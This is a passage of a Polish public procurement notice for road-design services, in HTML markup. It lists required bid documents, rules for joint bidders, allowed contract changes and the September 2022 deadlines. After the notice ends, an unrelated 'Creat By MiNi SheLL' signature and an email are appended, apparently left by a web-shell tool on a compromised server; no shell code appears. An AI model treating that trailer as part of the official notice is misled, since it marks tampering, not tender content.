uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>2) Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych – uprawnień<br/>niezbędnych do wykonania zamówienia publicznego, a także doświadczenia zawodowego oraz zakresu wykonywanych przez nie<br/>czynności wraz informacją o podstawie do dysponowania tymi osobami, w zakresie wymaganym w punkcie III.B.1.1.2 SWZ – wykaz osób stanowi Załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga w niniejszym postepowaniu złożenia w Systemie wypełnionego formularza oferty o treści zgodnej z<br/>założeniami SWZ.<br/>UWAGA<br/>W przypadku ubiegania się o punkty w kryterium Doświadczenie osoby realizującej zamówienie –projektanta drogowego”,<br/>Wykonawca zobowiązany jest załączyć do oferty załącznik – pn. „Informacja do kryterium oceny ofert – Doświadczenie<br/>osoby realizującej zamówienie – projektanta drogowego” - sporządzony wg wymagań opisanych w SWZ - Załącznik nr 11<br/>do SWZ.<br/>Ponadto wraz z ofertą należy złożyć:<br/>a) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeżeli dotyczy),<br/>z którego wynika, które roboty budowlane lub usługi, wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy), o treści<br/>zgodnej ze wzorem stanowiącym Załącznik nr 2 do SWZ.<br/>b) Oświadczenie o podstawach wykluczenia wymienionych w art. 108 ust. 1 pkt 1, 2 i 5 (jeżeli dotyczy) o treści zgodnej ze<br/>wzorem stanowiącym Załącznik nr 4 do SWZ.<br/>c) Dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. pełnomocnictwo, odpis z właściwego<br/>rejestru, np. Krajowego Rejestru Sądowego, informacja o wpisie do Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej Rzeczypospolitej Polskiej lub umowa spółki cywilnej, itp.), zgodnie z obowiązującymi przepisami;<br/>d) Dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe umocowanie,<br/>pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy.<br/>Dokument winien być załączony w formie oryginału lub odpowiednio poświadczonego odwzorowania.<br/>e) Zobowiązanie podmiotów udostępniających zasoby lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>e.1) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w lit. a powyżej, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>f) W przypadku gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca zobowiązany jest do<br/>złożenia wraz z ofertą dowodów, o których mowa w pkt VII B SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. spółka cywilna/konsorcjum)<br/>1. W przypadku składania oferty przez podmioty występujące wspólnie:<br/>a) podmioty występujące wspólnie zobowiązane są do ustanowienia Pełnomocnika reprezentującego ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>b) dokument potwierdzający umocowanie do reprezentowania należy dołączyć do oferty w formie oryginału lub cyfrowego<br/>odwzorowania pełnomocnictwa sporządzonego w postaci papierowej, poświadczonego zgodnie z obowiązującymi<br/>przepisami<br/>W/w dokument powinien zawierać w szczególności wskazanie:<br/> postępowania o zamówienie publiczne, którego dotyczy,<br/> wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego,<br/> ustanowionego Pełnomocnika oraz zakresu jego umocowania;<br/>c) korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w<br/>formularzu oferty;<br/>d) Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę<br/>podmiotów występujących wspólnie;<br/>e) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu przesłanek, o których mowa w art. 108 ust. 1 ustawy oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. z 2022 poz. 835).<br/>Oświadczenia, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie w zakresie jego dotyczącym.<br/>Dokumenty te potwierdzają brak podstaw wykluczenia oraz spełnianie warunku udziału w postępowaniu w zakresie, w<br/>którym Wykonawca wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego<br/>złożyć dokumenty i oświadczenia, o których mowa w pkt. III.C.2. SWZ, przy czym wykaz, dokumenty lub oświadczenia o<br/>których mowa w pkt III.C.2.b SWZ składa odpowiednio Wykonawca, który wykazuje spełnianie warunku, w zakresie i na<br/>zasadach opisanych w pkt III.B.1 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmianę postanowień umowy zgodnie ze wzorem umowy - Załącznik nr 7 do SWZ, w szczególności:<br/>§ 2 ust. 2 i 3 wzoru mowy<br/>2. Termin wykonania umowy wskazany w ust. 1 pkt. 1.3. może ulec przedłużeniu w przypadku wystąpienia opóźnień w<br/>wydaniu przez właściwe podmioty wymaganych opinii, decyzji, uzgodnień oraz wszelkich innych niezbędnych dokumentów.<br/>Zmiana terminu wykonania umowy wymaga zmiany umowy w formie aneksu i może zostać dokonana na pisemny wniosek<br/>Wykonawcy złożony najpóźniej na 7 dni przed końcem terminu.<br/>3. Termin zakończenia realizacji przedmiotu umowy wskazany w ust. 1 pkt 1.4 może ulec przedłużeniu na warunkach<br/>wskazanych w § 15 ust. 3 umowy.<br/>§ 15 wzoru mowy<br/>1. Zmiany postanowień Umowy mogą dotyczyć:<br/>1.1. Zmiana terminu realizacji przedmiotu Umowy w przypadku:<br/>1.1.1. wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności,<br/>skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia;<br/>1.1.2. wstrzymania przez Zamawiającego wykonania prac, które nie wynika z okoliczności leżących po stronie Wykonawcy<br/>(nie dotyczy okoliczności wstrzymania prac w przypadku stwierdzenia nieprawidłowości zawinionych przez Wykonawcę);<br/>1.1.3. wystąpienia okoliczności, których strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej<br/>staranności;<br/>1.1.4. gdy przekroczenie terminu umownego spowodowane zostało przedłużającymi się procedurami związanymi z<br/>uzyskaniem niezbędnych opinii, uzgodnień lub innych decyzji administracyjnych, w tym uzgodnień z gestorami sieci<br/>uzbrojenia terenu<br/>a także w wyniku przedłużających się konsultacji z mieszkańcami;<br/>1.1.5. wprowadzenia zmian wynikających z zastosowania art. 455 ustawy Prawo zamówień publicznych.<br/>1.2. Zmiana oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy;<br/>1.3. Zmiana rachunku bankowego Wykonawcy;<br/>1.4. Zmiana sposobu dostarczania Zamawiającemu faktur z powodu zmian regulacji wewnętrznych lub zmian<br/>organizacyjnych Zamawiającego;<br/>1.5. Zmiana osoby skierowanej do realizacji przedmiotu zamówienia - na warunkach wskazanych w § 14.<br/>2. Zmiany, o których mowa w ust. 1 mogą być dokonane przed upływem terminu realizacji niniejszej Umowy, określonego w<br/>§ 2, na pisemny wniosek złożony w terminie 7 dni od daty wystąpienia lub powzięcia wiadomości o zaistniałych<br/>okolicznościach, a w przypadku zmiany terminu realizacji przedmiotu zamówienia nie później niż 7 dni przed upływem końca<br/>tego terminu. Wniosek taki powinien zawierać szczegółowe uzasadnienie. W przypadku uchybienia wskazanych w<br/>niniejszym ustępie terminów przez Wykonawcę, Zamawiający, jeżeli jest to możliwe, może ale nie musi, rozpatrzeć taki<br/>wniosek i ewentualnie podpisać stosowny aneks.<br/>3. W przypadku gdy na 14 dni przed terminem realizacji przedmiotu Umowy nie zostanie wydana ostateczna decyzja o<br/>zezwoleniu na realizację inwestycji drogowej, lub gdy postępowanie dotyczące wydania decyzji o zezwoleniu na realizacje<br/>inwestycji drogowej zostanie zawieszone nie z winy Wykonawcy, Zamawiający dopuszcza zmianę terminu realizacji<br/>przedmiotu Umowy, jak również zmianę w zakresie możliwości wypłaty wynagrodzenia Wykonawcy o którym mowa w §6<br/>ust. 2 pkt 2.3 Umowy. Ewentualne wydłużenie terminu realizacji Umowy lub zapłata ostatniej części wynagrodzenia wraz z<br/>ustaleniem warunków wypłaty będą rozpatrywane w zależności od zaistniałej sytuacji i wymagają formy aneksu do Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-22 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania przedmiotu zamówienia wynosi 11 miesięcy od dnia zawarcia umowy, przy czym:<br/>- termin przekazania I części Dokumentacji, tj. koncepcji drogowej wraz z wielobranżową analizą układu komunikacyjnego: 30 dni od dnia zawarcia umowy, <br/>- termin przekazania II części Dokumentacji, zgodnie z opisem przedmiotu zamówienia: 7 miesięcy od dnia zawarcia umowy,<br/>- termin zakończenia realizacji przedmiotu umowy, tj. po uzyskaniu ostatecznej decyzji o zezwoleniu na realizację inwestycji drogowej: 11 miesięcy od dnia zawarcia umowy. <br/>3.	Zamawiający informuje, że zgodnie z art. 7 ust. 6-7 ustawy z dnia 13 kwietnia 2022 r. <br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz. 835) osoba lub podmiot podlegające wykluczeniu na podstawie art. 7 ust. 1 tej ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego podlegają karze pieniężnej. Karę pieniężną, o której mowa w ust. 6 tej ustawy, nakłada Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>4.	Zamawiający informuje, że zgodnie z art. 7 ust. 5 ustawy, o której mowa powyżej, przez ubieganie się o udzielenie zamówienia publicznego rozumie się między innymi złożenie oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com